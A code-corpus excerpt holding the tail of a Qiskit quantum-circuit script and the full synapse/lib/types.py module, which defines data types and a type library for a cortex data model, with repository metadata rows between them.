prog.cx(input_qubit[3],input_qubit[0]) # number=33
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = FakeVigo()
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_noisy2667.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 34.702479 | 140 | 0.654203 |
78f3d1419de5568be8b1d6bfd895e87b23bf907f | 37,559 | py | Python | synapse/lib/types.py | larrycameron80/synapse | 24bf21c40b4a467e5dc28c8204aecaf502d5cddf | [
"Apache-2.0"
] | null | null | null | synapse/lib/types.py | larrycameron80/synapse | 24bf21c40b4a467e5dc28c8204aecaf502d5cddf | [
"Apache-2.0"
] | null | null | null | synapse/lib/types.py | larrycameron80/synapse | 24bf21c40b4a467e5dc28c8204aecaf502d5cddf | [
"Apache-2.0"
] | null | null | null | import json
import base64
import logging
import collections
import regex
import synapse.common as s_common
import synapse.dyndeps as s_dyndeps
import synapse.lib.time as s_time
import synapse.lib.syntax as s_syntax
import synapse.lib.modules as s_modules
import synapse.lib.msgpack as s_msgpack
import synapse.lookup.iso3166 as s_l_iso3166
logger = logging.getLogger(__name__)
class DataType:
subprops = ()
def __init__(self, tlib, name, **info):
self.tlib = tlib
self.name = name
self.info = info
self.prop = self.info.get('prop')
s_common.reqStorDict(info)
def _raiseBadValu(self, valu, **info):
raise s_common.BadTypeValu(name=self.name, valu=valu, **info)
def get(self, prop, defval=None):
'''
Retrieve a type info property from this type or parent types.
Example:
ex = item.get('doc')
'''
return self.tlib.getTypeInfo(self.name, prop, defval=defval)
def subs(self):
'''
Implement if the presence of a property with this type requires sub props.
'''
return self.subprops
def extend(self, name, **info):
'''
Construct a new subtype from this instance.
'''
for k, v in self.info.items():
info.setdefault(k, v)
return self.__class__(self.tlib, name, **info)
def parse(self, text, oldval=None):
'''
Parse input text and return the system mode (normalized) value for the type.
Example:
valu = tobj.parse(text)
'''
return self.norm(text, oldval=oldval)
def repr(self, valu):
return valu
class GuidType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
self._guid_alias = info.get('alias')
# TODO figure out what to do about tlib vs core issues
self._getTufoByProp = getattr(tlib, 'getTufoByProp', None)
self._reqPropNorm = getattr(tlib, 'reqPropNorm', None)
def norm(self, valu, oldval=None):
if isinstance(valu, dict):
vals = list(valu.items())
return self._norm_list(vals, oldval)
if isinstance(valu, (list, tuple)):
return self._norm_list(valu, oldval)
if not isinstance(valu, str) or len(valu) < 1:
self._raiseBadValu(valu)
return self._norm_str(valu, oldval)
def _norm_str(self, text, oldval=None):
text = text.strip()
if not text:
self._raiseBadValu(text, mesg='No text left after strip().')
if text[0] == '(':
vals, off = s_syntax.parse_list(text)
if off != len(text):
self._raiseBadValu(text, off=off, vals=vals,
mesg='List parsing for guid type did not consume all of the input text.')
return self._norm_list(vals, oldval)
# generate me one. we dont care.
if text == '*':
return s_common.guid(), {}
if text[0] != '$':
retn = text.lower().replace('-', '')
if not s_common.isguid(retn):
self._raiseBadValu(text, mesg='Expected a 32 char guid string')
return retn, {}
node = self.tlib.getTufoByProp('syn:alias', text)
if node is not None:
return node[1].get('syn:alias:iden'), {}
# TODO remove legacy model aliases
if self._guid_alias is None:
self._raiseBadValu(text, mesg='guid resolver syntax used with non-aliased guid')
if self._getTufoByProp is None:
self._raiseBadValu(text, mesg='guid resolver syntax used with non-cortex tlib')
# ( sigh... eventually everything will be a cortex... )
node = self._getTufoByProp(self._guid_alias, text[1:])
if node is None:
self._raiseBadValu(text, mesg='no result for guid resolver',
alias=self._guid_alias)
iden = node[1].get(node[1].get('tufo:form'))
return iden, {}
def _norm_list(self, valu, oldval=None):
if not valu:
self._raiseBadValu(valu=valu, mesg='No values present in list to make a guid with')
if not self.prop:
self._raiseBadValu(valu,
mesg='Unable to norm a list for a guidtype which is not associated with a property.')
vals = []
subs = {}
for kv in valu:
if not isinstance(kv, (list, tuple)) or not len(kv) == 2:
self._raiseBadValu(valu, kv=kv, mesg='Expected a list or tuple of length 2')
k, v = kv
fullprop = self.prop + ':' + k
try:
v, ssubs = self._reqPropNorm(fullprop, v)
except s_common.NoSuchProp:
logger.exception('Error while norming list of props for guid type.')
self._raiseBadValu(valu, prop=k, fullprop=fullprop,
mesg='Non-model property provided when making a stable guid.')
subs.update({':'.join([k, _k]): _v for _k, _v in ssubs.items()})
vals.append((k, v))
# Stable sort based on the property
vals.sort(key=lambda x: x[0])
valu = s_common.guid(valu=vals)
subs.update(vals)
return valu, subs
class NDefType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
# TODO figure out what to do about tlib vs core issues
self._isTufoForm = getattr(tlib, 'isTufoForm', None)
self._getPropNorm = getattr(tlib, 'getPropNorm', None)
def norm(self, valu, oldval=None):
if isinstance(valu, (list, tuple)):
return self._norm_list(valu, oldval)
if not isinstance(valu, str) or len(valu) < 1:
self._raiseBadValu(valu)
return self._norm_str(valu, oldval)
def _norm_str(self, text, oldval=None):
text = text.strip()
if not text:
self._raiseBadValu(text, mesg='No text left after strip().')
if text[0] == '(':
vals, off = s_syntax.parse_list(text)
if off != len(text): # pragma: no cover
self._raiseBadValu(text, off=off, vals=vals,
mesg='List parsing for ndef type did not consume all of the input text.')
return self._norm_list(vals, oldval)
if not s_common.isguid(text):
self._raiseBadValu(text, mesg='Expected a 32 char guid string')
return text, {}
def _norm_list(self, valu, oldval=None):
if not valu:
self._raiseBadValu(valu=valu, mesg='No values present in list to make a guid with')
form, fvalu = valu
if not self._isTufoForm(form):
self._raiseBadValu(valu=valu, form=form,
mesg='Form is not a valid form.')
# NDefType specifically does not care about the subs since
# they aren't useful for universal node identification
fvalu, _ = self._getPropNorm(form, fvalu)
retn = s_common.guid((form, fvalu))
return retn, {}
class StrType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
self.regex = None
self.envals = None
self.restrip = None
self.frobintfmt = None
self.strip = info.get('strip', 0)
self.nullval = info.get('nullval')
enumstr = info.get('enums')
if enumstr is not None:
self.envals = enumstr.split(',')
regexp = info.get('regex')
if regexp is not None:
self.regex = regex.compile(regexp)
restrip = info.get('restrip')
if restrip is not None:
self.restrip = regex.compile(restrip)
frobintfmt = info.get('frob_int_fmt')
if frobintfmt is not None:
self.frobintfmt = frobintfmt
def norm(self, valu, oldval=None):
if self.frobintfmt and isinstance(valu, int):
valu = self.frobintfmt % valu
if not isinstance(valu, str):
self._raiseBadValu(valu)
if self.info.get('lower'):
valu = valu.lower()
if valu == self.nullval:
return valu, {}
if self.restrip:
valu = self.restrip.sub('', valu)
if self.strip:
valu = valu.strip()
if self.envals is not None and valu not in self.envals:
self._raiseBadValu(valu, enums=self.info.get('enums'))
if self.regex is not None and not self.regex.match(valu):
self._raiseBadValu(valu, regex=self.info.get('regex'))
return valu, {}
class JsonType(DataType):
def norm(self, valu, oldval=None):
if not isinstance(valu, str):
try:
return json.dumps(valu, sort_keys=True, separators=(',', ':')), {}
except Exception as e:
self._raiseBadValu(valu, mesg='Unable to normalize object as json.')
try:
return json.dumps(json.loads(valu), sort_keys=True, separators=(',', ':')), {}
except Exception as e:
self._raiseBadValu(valu, mesg='Unable to norm json string')
class IntType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
self.fmt = info.get('fmt', '%d')
# self.modval = info.get('mod',None)
self.minval = info.get('min', None)
self.maxval = info.get('max', None)
self.ismin = info.get('ismin', False)
self.ismax = info.get('ismax', False)
# cache the min or max function to avoid cond logic
# during norm() for perf
self.minmax = None
if self.ismin:
self.minmax = min
elif self.ismax:
self.minmax = max
def repr(self, valu):
return self.fmt % valu
def norm(self, valu, oldval=None):
if isinstance(valu, str):
try:
valu = int(valu, 0)
except ValueError as e:
self._raiseBadValu(valu, mesg='Unable to cast valu to int')
if not isinstance(valu, int):
self._raiseBadValu(valu, mesg='Valu is not an int')
if valu < -9223372036854775808:
self._raiseBadValu(valu, mesg='Value less than 64bit signed integer minimum (-9223372036854775808)')
if valu > 9223372036854775807:
self._raiseBadValu(valu, mesg='Value greater than 64bit signed integer maximum (9223372036854775807)')
if oldval is not None and self.minmax:
valu = self.minmax(valu, oldval)
if self.minval is not None and valu < self.minval:
self._raiseBadValu(valu, minval=self.minval)
if self.maxval is not None and valu > self.maxval:
self._raiseBadValu(valu, maxval=self.maxval)
return valu, {}
def enMsgB64(item):
# FIXME find a way to go directly from binary bytes to
# base64 *string* to avoid the extra decode pass..
return base64.b64encode(s_msgpack.en(item)).decode('utf8')
def deMsgB64(text):
# FIXME see above
return s_msgpack.un(base64.b64decode(text.encode('utf8')))
jsseps = (',', ':')
def islist(x):
return type(x) in (list, tuple)
class MultiFieldType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
# TODO figure out what to do about tlib vs core issues
self._getPropType = getattr(tlib, 'getPropType', None)
self.fields = None
def _norm_fields(self, valu):
fields = self._get_fields()
if len(valu) != len(fields):
self._raiseBadValu(valu, mesg='field count != %d' % (len(fields),))
vals = []
subs = {}
for valu, (name, item) in s_common.iterzip(valu, fields):
norm, fubs = item.norm(valu)
vals.append(norm)
subs[name] = norm
for fubk, fubv in fubs.items():
subs[name + ':' + fubk] = fubv
return vals, subs
def _get_fields(self):
if self.fields is None:
self.fields = []
# maintain legacy "fields=" syntax for a bit yet...
fields = self.info.get('fields')
if fields is not None:
if fields:
for part in fields.split('|'):
fname, ftype = part.split(',')
fitem = self.tlib.getTypeInst(ftype)
if self.prop:
_fitem = self._getPropType(ftype)
if _fitem:
fitem = _fitem
self.fields.append((fname, fitem))
return self.fields
# process names= and types= info fields
fnames = []
ftypes = []
fnstr = self.info.get('names')
if fnstr:
fnames.extend(fnstr.split(','))
ftstr = self.info.get('types', '')
if ftstr:
ftypes.extend(ftstr.split(','))
self.flen = len(ftypes)
if len(fnames) != self.flen:
raise s_common.BadInfoValu(name='types', valu=ftstr, mesg='len(names) != len(types)')
for i in range(self.flen):
item = self.tlib.getTypeInst(ftypes[i])
self.fields.append((fnames[i], item))
return self.fields
def _splitpairs(text, sep0, sep1):
'''
Split text into parts via sep0 and then split each part into a (key, value) pair via sep1
'''
for part in text.split(sep0):
k, v = part.split(sep1)
yield k.strip(), v.strip()
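# e.g. list(_splitpairs('foo=1,bar=2', ',', '=')) -> [('foo', '1'), ('bar', '2')] (illustrative)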
class CompType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
# TODO figure out what to do about tlib vs core issues
self._getPropNorm = getattr(tlib, 'getPropNorm', None)
self.fields = []
self.optfields = []
fstr = self.info.get('fields')
if fstr:
if fstr.find('=') != -1:
self.fields.extend(_splitpairs(fstr, ',', '='))
else:
self.fields.extend(_splitpairs(fstr, '|', ','))
self.fsize = len(self.fields)
ostr = self.info.get('optfields')
if ostr:
self.optfields.extend(_splitpairs(ostr, ',', '='))
# stabilize order to alphabetical since it effects
# the eventual guid generation
self.optfields.sort()
def _norm_str(self, text, oldval=None):
text = text.strip()
if not text:
self._raiseBadValu(text, mesg='No text left after strip().')
if text[0] != '(':
return self.tlib.getTypeNorm('guid', text)
vals, off = s_syntax.parse_list(text)
if off != len(text):
self._raiseBadValu(text, off=off, vals=vals,
                               mesg='List parsing for comp type did not consume all of the input text.')
return self._norm_list(vals)
def _norm_list(self, valu, oldval=None):
opts = {}
subs = {}
retn = []
vlen = len(valu)
if vlen < self.fsize:
self._raiseBadValu(valu, mesg='Expected %d fields and got %d' % (self.fsize, len(valu)))
for k, v in valu[self.fsize:]:
opts[k] = v
vals = valu[:self.fsize]
for v, (name, tname) in s_common.iterzip(vals, self.fields):
            # FIXME - this if/else is an artifact of typelib/datamodel separation
if self.prop:
if self.tlib.isTufoProp(tname):
norm, ssubs = self._getPropNorm(tname, v)
else:
norm, ssubs = self.tlib.getTypeNorm(tname, v)
else:
norm, ssubs = self.tlib.getTypeNorm(tname, v)
subs[name] = norm
for subkey, subval in ssubs.items():
subs[name + ':' + subkey] = subval
retn.append(norm)
for name, tname in self.optfields:
v = opts.get(name)
if v is None:
continue
norm, ssubs = self.tlib.getTypeNorm(tname, v)
subs[name] = norm
for subkey, subval in ssubs.items():
subs[name + ':' + subkey] = subval
retn.append((name, norm))
return s_common.guid(retn), subs
def _norm_dict(self, valu, oldval=None):
newv = []
for name, ftype in self.fields:
fval = valu.get(name)
if fval is None:
self._raiseBadValu(valu, mesg='missing field: %s' % (name,))
newv.append(fval)
for name, ftype in self.optfields:
fval = valu.get(name)
if fval is not None:
newv.append((name, fval))
return self._norm_list(newv)
def norm(self, valu, oldval=None):
# if it's already a guid, we have nothing to normalize...
if isinstance(valu, str):
return self._norm_str(valu, oldval=oldval)
if isinstance(valu, dict):
return self._norm_dict(valu, oldval=oldval)
if not islist(valu):
self._raiseBadValu(valu, mesg='Expected guid or list/tuple')
return self._norm_list(valu)
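# Illustrative sketch (not part of the original module): the input shapes a comp
# type accepts, assuming a hypothetical subtype such as
#   tlib.addType('foo:compo', subof='comp', fields='bar=str,baz=int')
# Any of the following would normalize to a stable guid plus subs:
#   tlib.getTypeNorm('foo:compo', '(hehe,20)')                  # text form via s_syntax.parse_list
#   tlib.getTypeNorm('foo:compo', ('hehe', 20))                 # list/tuple form
#   tlib.getTypeNorm('foo:compo', {'bar': 'hehe', 'baz': 20})   # dict form
# A string that does not start with '(' is treated as an already-formed guid.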
class XrefType(DataType):
'''
    The XrefType allows linking a specific type of node to an unspecified
set of node forms.
Example Sub Type:
addType('foo:barrefs', subof='xref', source='bar,foo:bar')
'''
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
self._sorc_type = None
self._sorc_name = None
sorc = info.get('source')
if sorc is not None:
parts = sorc.split(',')
if len(parts) != 2:
raise s_common.BadInfoValu(name='source', valu=sorc, mesg='expected source=<name>,<type>')
self._sorc_name = parts[0]
self._sorc_type = parts[1]
def norm(self, valu, oldval=None):
if isinstance(valu, str):
return self._norm_str(valu, oldval=oldval)
if not islist(valu):
self._raiseBadValu(valu, mesg='Expected guid, psv, or list')
return self._norm_list(valu, oldval=None)
def _norm_str(self, text, oldval=None):
text = text.strip()
if not text:
self._raiseBadValu(text, mesg='No text left after strip().')
if len(text) == 32 and text.find('=') == -1:
return self.tlib.getTypeNorm('guid', text)
vals, off = s_syntax.parse_list(text)
if off != len(text):
self._raiseBadValu(text, off=off, vals=vals,
                               mesg='List parsing for comp type did not consume all of the input text.')
return self._norm_list(vals)
def _norm_list(self, valu, oldval=None):
if len(valu) != 2:
self._raiseBadValu(valu, mesg='xref type requires 2 fields')
valu, pvval = valu
pvval, pvsub = self.tlib.getTypeNorm('propvalu', pvval)
tstr, tval = pvval.split('=', 1)
valu, vsub = self.tlib.getTypeNorm(self._sorc_type, valu)
tval, tsub = self.tlib.getTypeNorm(tstr, tval)
iden = s_common.guid((valu, tstr, tval))
subs = {
self._sorc_name: valu,
'xref': pvval,
}
for k, v in vsub.items():
k = self._sorc_name + ':' + k
subs[k] = v
for k, v in pvsub.items():
k = 'xref:' + k
subs[k] = v
return iden, subs
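# Illustrative sketch (not part of the original module): an xref subtype as in
# the docstring above; the names and values here are hypothetical.
#   tlib.addType('foo:barrefs', subof='xref', source='bar,foo:bar')
#   tlib.getTypeNorm('foo:barrefs', (bar_valu, 'inet:fqdn=woot.com'))
# would return a guid plus subs roughly like
#   {'bar': <normed bar_valu>, 'xref': 'inet:fqdn=woot.com', 'xref:prop': 'inet:fqdn', ...}
# with the second field routed through the 'propvalu' type.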
class TimeType(DataType):
# FIXME subfields for various time parts (year,month,etc)
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
self.ismin = info.get('ismin', False)
self.ismax = info.get('ismax', False)
self.minmax = None
if self.ismin:
self.minmax = min
elif self.ismax:
self.minmax = max
def norm(self, valu, oldval=None):
subs = {}
# make the string into int form then apply our min/max
if isinstance(valu, str):
valu, subs = self._norm_str(valu, oldval=oldval)
if oldval is not None and self.minmax:
valu = self.minmax(valu, oldval)
return valu, subs
def _norm_str(self, text, oldval=None):
if text.strip().lower() == 'now':
return s_common.now(), {}
return s_time.parse(text), {}
def repr(self, valu):
return s_time.repr(valu)
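# Illustrative sketch (not part of the original module): time normalization as
# registered below ('time' uses an example value of '20161216084632').
#   tlib.getTypeNorm('time', '20161216084632')   # -> (epoch milliseconds, {})
#   tlib.getTypeNorm('time', 'now')              # -> (s_common.now(), {})
# Subtypes declared with ismin=1 / ismax=1 keep the min / max of the new and old values.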
class SeprType(MultiFieldType):
def __init__(self, tlib, name, **info):
MultiFieldType.__init__(self, tlib, name, **info)
self.sepr = info.get('sep', ',')
self.reverse = info.get('reverse', 0)
def norm(self, valu, oldval=None):
subs = {}
reprs = []
if isinstance(valu, str):
valu = self._split_str(valu)
        # only other possibility should be that it was a list
for part, (name, tobj) in self._zipvals(valu):
if tobj == self:
norm, nsub = part, {}
reprs.append(norm)
else:
norm, nsub = tobj.norm(part)
reprs.append(tobj.repr(norm))
subs[name] = norm
for subn, subv in nsub.items():
subs['%s:%s' % (name, subn)] = subv
return self.sepr.join(reprs), subs
def _split_str(self, text):
fields = self._get_fields()
if self.reverse:
parts = text.rsplit(self.sepr, len(fields) - 1)
else:
parts = text.split(self.sepr, len(fields) - 1)
if len(parts) != len(fields):
self._raiseBadValu(text, sep=self.sepr, mesg='split: %d fields: %d' % (len(parts), len(fields)))
return parts
def _zipvals(self, vals):
return s_common.iterzip(vals, self._get_fields())
class BoolType(DataType):
def norm(self, valu, oldval=None):
if isinstance(valu, str):
valu = valu.lower()
if valu in ('true', 't', 'y', 'yes', '1', 'on'):
return 1, {}
if valu in ('false', 'f', 'n', 'no', '0', 'off'):
return 0, {}
self._raiseBadValu(valu, mesg='Invalid boolean string')
return int(bool(valu)), {}
def repr(self, valu):
return repr(bool(valu))
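# Illustrative sketch (not part of the original module): boolean normalization.
#   tlib.getTypeNorm('bool', 'Yes')   # -> (1, {})
#   tlib.getTypeNorm('bool', 'off')   # -> (0, {})
#   tlib.getTypeNorm('bool', 2)       # -> (1, {}) via int(bool(valu))
# Any other string is rejected through _raiseBadValu().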
tagre = regex.compile(r'^([\w]+\.)*[\w]+$')
class TagType(DataType):
def norm(self, valu, oldval=None):
parts = valu.split('@', 1)
subs = {}
if len(parts) == 2:
strs = parts[1].split('-')
tims = [self.tlib.getTypeNorm('time', s)[0] for s in strs]
tmin = min(tims)
tmax = max(tims)
subs['seen:min'] = tmin
subs['seen:max'] = tmax
retn = parts[0].lower()
if not tagre.match(retn):
self._raiseBadValu(valu)
return retn, subs
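# Illustrative sketch (not part of the original module): tag normalization with
# the optional @<time>-<time> window handled above; the timestamps are made up.
#   tlib.getTypeNorm('syn:tag', 'Foo.Bar')
#       # -> ('foo.bar', {})
#   tlib.getTypeNorm('syn:tag', 'foo.bar@20160101-20170101')
#       # -> ('foo.bar', {'seen:min': <2016 epoch ms>, 'seen:max': <2017 epoch ms>})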
class StormType(DataType):
def norm(self, valu, oldval=None):
try:
s_syntax.parse(valu)
except Exception as e:
self._raiseBadValu(valu)
return valu, {}
class PermType(DataType):
'''
Enforce that the permission string and options are known.
'''
def norm(self, valu, oldval=None):
try:
pnfo, off = s_syntax.parse_perm(valu)
except Exception as e:
self._raiseBadValu(valu)
if off != len(valu):
self._raiseBadValu(valu)
return valu, {}
class PropValuType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
# TODO figure out what to do about tlib vs core issues
self._reqPropNorm = getattr(tlib, 'reqPropNorm', None)
self._getPropRepr = getattr(tlib, 'getPropRepr', None)
def norm(self, valu, oldval=None):
# if it's already a str, we'll need to split it into its two parts to norm.
if isinstance(valu, str):
return self._norm_str(valu, oldval=oldval)
if not islist(valu):
self._raiseBadValu(valu, mesg='Expected str or list/tuple.')
return self._norm_list(valu)
def _norm_str(self, text, oldval=None):
text = text.strip()
if not text:
self._raiseBadValu(text, mesg='No text left after strip().')
if '=' not in text:
self._raiseBadValu(text, mesg='PropValu is missing a =')
valu = text.split('=', 1)
return self._norm_list(valu)
def _norm_list(self, valu, oldval=None):
if len(valu) != 2:
self._raiseBadValu(valu=valu, mesg='PropValu requires two values to norm.')
prop, valu = valu
try:
nvalu, nsubs = self._reqPropNorm(prop, valu, oldval=oldval)
except (s_common.BadTypeValu, s_common.NoSuchProp) as e:
logger.exception('Failed to norm PropValu.')
self._raiseBadValu(valu, mesg='Unable to norm PropValu', prop=prop)
subs = {'prop': prop}
if isinstance(nvalu, str):
subs['strval'] = nvalu
else:
subs['intval'] = nvalu
nrepr = self._getPropRepr(prop, nvalu)
retv = '='.join([prop, nrepr])
return retv, subs
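# Illustrative sketch (not part of the original module): propvalu normalization,
# matching the ex='foo:bar=1234' registered below and assuming foo:bar is an int prop.
#   tlib.getTypeNorm('propvalu', 'foo:bar=1234')
#       # -> ('foo:bar=1234', {'prop': 'foo:bar', 'intval': 1234})
# A two-element list/tuple such as ('foo:bar', 1234) takes the same path through _norm_list().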
class TypeLib:
'''
An extensible type library for use in cortex data models.
'''
def __init__(self, load=True):
self.types = {}
self.casts = {}
self.typeinfo = {}
self.typetree = {}
self.subscache = {}
self.modlnames = set()
        # pend creation of subtypes for non-existent base types
# until the base type gets loaded.
self.pended = collections.defaultdict(list)
self.addType('str', ctor='synapse.lib.types.StrType', doc='The base string type')
self.addType('int', ctor='synapse.lib.types.IntType', doc='The base integer type')
self.addType('bool', ctor='synapse.lib.types.BoolType', doc='A boolean type')
self.addType('json', ctor='synapse.lib.types.JsonType', doc='A json type (stored as str)')
self.addType('guid', ctor='synapse.lib.types.GuidType', doc='A Globally Unique Identifier type')
self.addType('sepr', ctor='synapse.lib.types.SeprType',
doc='A multi-field composite type which uses separated repr values')
self.addType('comp', ctor='synapse.lib.types.CompType',
doc='A multi-field composite type which generates a stable guid from normalized fields')
self.addType('xref', ctor='synapse.lib.types.XrefType',
doc='A multi-field composite type which can be used to link a known form to an unknown form')
self.addType('time', ctor='synapse.lib.types.TimeType',
doc='Timestamp in milliseconds since epoch', ex='20161216084632')
self.addType('ndef', ctor='synapse.lib.types.NDefType',
doc='The type used for normalizing node:ndef values.')
self.addType('syn:tag', ctor='synapse.lib.types.TagType', doc='A synapse tag', ex='foo.bar')
self.addType('syn:perm', ctor='synapse.lib.types.PermType', doc='A synapse permission string')
self.addType('syn:storm', ctor='synapse.lib.types.StormType', doc='A synapse storm query string')
self.addType('propvalu', ctor='synapse.lib.types.PropValuType', ex='foo:bar=1234',
doc='An equal sign delimited property/valu combination.',)
# add base synapse types
self.addType('syn:core', subof='str')
self.addType('syn:prop', subof='str', regex=r'^([\w]+:)*([\w]+|\*)$', lower=1)
self.addType('syn:type', subof='str', regex=r'^([\w]+:)*[\w]+$', lower=1)
self.addType('syn:glob', subof='str', regex=r'^([\w]+:)*[\w]+:\*$', lower=1)
self.addType('int:min', subof='int', ismin=1)
self.addType('int:max', subof='int', ismax=1)
self.addType('str:lwr', subof='str', lower=1, strip=1)
self.addType('str:txt', subof='str', doc='Multi-line text or text blob.')
self.addType('str:hex', subof='str', frob_int_fmt='%x', regex=r'^[0-9a-f]+$', lower=1)
self.addTypeCast('country:2:cc', self._castCountry2CC)
self.addTypeCast('int:2:str10', self._castMakeInt10)
self.addTypeCast('make:guid', self._castMakeGuid)
self.addTypeCast('make:json', self._castMakeJson)
if load:
self.loadModModels()
def _castCountry2CC(self, valu):
valu = valu.replace('.', '').lower()
return s_l_iso3166.country2iso.get(valu)
def _castMakeGuid(self, valu):
return s_common.guid(valu)
def _castMakeJson(self, valu):
valu = json.dumps(valu, sort_keys=True, separators=(',', ':'))
return valu
def _castMakeInt10(self, valu):
if isinstance(valu, int):
valu = str(valu)
return valu
return valu
def getTypeInst(self, name):
'''
Return the DataType instance for the given type name.
Example:
dtype = tlib.getTypeInst('foo:bar')
NOTE: This API returns non-primitive objects and can not be
used over telepath RMI.
'''
return self.types.get(name)
def getTypeBases(self, name):
'''
        Return a list of type inheritance names beginning with the base type.
Example:
for base in tlib.getTypeBases('foo:minval'):
                print('base type: %s' % (base,))
'''
done = [name]
todo = self.typetree.get(name)
while todo is not None:
done.append(todo)
todo = self.typetree.get(todo)
done.reverse()
return done
def isSubType(self, name, base):
'''
Returns True if the given type name is a sub-type of the base name.
Example:
if tlib.isSubType('foo','str'):
dostuff()
'''
key = (name, base)
ret = self.subscache.get(key)
if ret is None:
ret = base in self.getTypeBases(name)
self.subscache[key] = ret
return ret
def addDataModels(self, modtups):
'''
Load a list of (name,model) tuples.
Args:
modtups ([(str,dict)]): A list of (name,modl) tuples.
Returns:
(None)
        NOTE: This API loads all types first and may therefore be used to
prevent type dependency ordering issues between multiple models.
'''
return self._addDataModels(modtups)
def addDataModel(self, name, modl):
return self.addDataModels([(name, modl)])
def isDataModl(self, name):
'''
Return True if the given data model name exists.
Args:
name (str): The name of the data model
Returns:
(boolean): True if the model exists
'''
return name in self.modlnames
def _addDataModels(self, modtups):
for modname, moddict in modtups:
self.modlnames.add(modname)
# add all base types first to simplify deps
for name, info in moddict.get('types', ()):
try:
self.addType(name, **info)
except Exception as e:
logger.exception('type %s: %s' % (name, e))
def loadModModels(self):
dynmodls = s_modules.call_ctor('getBaseModels')
models = []
for name, modls, excp in dynmodls:
if not modls:
logger.warning('dyn model empty: %r %r' % (name, excp))
continue
models.extend(modls)
self.addDataModels(models)
def _bumpBasePend(self, name):
for name, info in self.pended.pop(name, ()):
try:
self.addType(name, **info)
except Exception as e:
logger.exception('pended: addType %s' % name)
def getDataType(self, name):
'''
Return the DataType subclass for the given type name.
'''
return self.types.get(name)
def isDataType(self, name):
'''
Return boolean which is true if the given name is a data type.
Example:
if tlib.isDataType('foo:bar'):
dostuff()
'''
return self.types.get(name) is not None
def reqDataType(self, name):
'''
Return a reference to the named DataType or raise NoSuchType.
Args:
name (str): Name of the type to get a reference for.
Returns:
DataType: Instance of a DataType for that name.
Raises:
NoSuchType: If the type is not valid.
'''
item = self.getDataType(name)
if item is None:
raise s_common.NoSuchType(name=name)
return item
def addType(self, name, **info):
'''
Add a type to the cached types.
Args:
name (str): Name of the type to add.
**info (dict): Type properties to include.
Example:
Add a new foo:bar type::
tlib.addType('foo:bar', subof='str', doc='A foo bar.')
Raises:
DupTypeName: If the type already exists.
'''
if self.types.get(name) is not None:
raise s_common.DupTypeName(name=name)
ctor = info.get('ctor')
subof = info.get('subof')
if ctor is None and subof is None:
raise Exception('addType must have either ctor= or subof=')
if ctor is not None:
self.typeinfo[name] = info
try:
item = s_dyndeps.tryDynFunc(ctor, self, name, **info)
self.types[name] = item
self._bumpBasePend(name)
return True
except Exception as e:
logger.warning('failed to ctor type %s', name, exc_info=True)
logger.debug('failed to ctor type %s', name, exc_info=True)
self.typeinfo.pop(name, None)
try:
base = self.reqDataType(subof)
# inherit docs and examples from parent types
self.typeinfo[name] = info
item = base.extend(name, **info)
self.types[name] = item
self._bumpBasePend(name)
self.typetree[name] = subof
self.subscache.clear()
return True
except s_common.NoSuchType as e:
tnam = e.errinfo.get('name')
self.typeinfo.pop(name, None)
self.pended[tnam].append((name, info))
return False
def getTypeDefs(self):
'''
Return a list of (name,info) tuples for all the types.
Returns:
([(name,info)]): The loaded types
'''
return list(self.typeinfo.items())
def getTypeDef(self, name):
'''
Get the definition for a given type.
Args:
name (str): Name of the type to look up.
Examples:
Do stuff with the type definition of 'int'::
tdef = tlib.getTypeDef('int')
dostuff(tdef)
Returns:
        ((str, dict)): The type definition tufo. The str is the name of the type, and the dictionary holds any type
options (ctor and subof values). If the name is not a registered type, this is None.
'''
info = self.typeinfo.get(name)
if info is None:
return None
return (name, info)
def getTypeInfo(self, name, prop, defval=None):
'''
        A helper to return an info prop for the type or its parents.
Example:
ex = tlib.getTypeInfo('inet:tcp4','ex')
'''
todo = name
while todo is not None:
info = self.typeinfo.get(todo)
if info is None:
return defval
ret = info.get(prop)
if ret is not None:
return ret
todo = info.get('subof')
return defval
def getTypeNorm(self, name, valu, oldval=None):
'''
Normalize a type specific value in system mode.
Example:
fqdn,subs = tlib.getTypeNorm('inet:fqdn','Foo.Com')
'''
return self.reqDataType(name).norm(valu, oldval=oldval)
def getTypeCast(self, name, valu):
'''
Use either a type or a registered "cast" name to normalize
the given input.
Example:
valu = tlib.getTypeCast("foo:bar","hehe")
'''
func = self.casts.get(name)
if func is not None:
return func(valu)
return self.getTypeNorm(name, valu)[0]
def addTypeCast(self, name, func):
'''
Add a "cast" function to do normalization without
creating a complete type.
'''
self.casts[name] = func
def getTypeRepr(self, name, valu):
'''
        Return the human readable form of the given type value.
Example:
print( tlib.getTypeRepr('inet:ipv4', ipv4addr) )
'''
return self.reqDataType(name).repr(valu)
def getTypeParse(self, name, text):
'''
        Parse input text for the given type into its system form.
Example:
ipv4,subs = tlib.getTypeParse('inet:ipv4','1.2.3.4')
'''
return self.reqDataType(name).parse(text)
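# Illustrative usage sketch (not part of the original module), combining the
# docstring examples above; actual results depend on the loaded data models.
#   tlib = TypeLib()
#   tlib.addType('foo:bar', subof='str', doc='A foo bar.')
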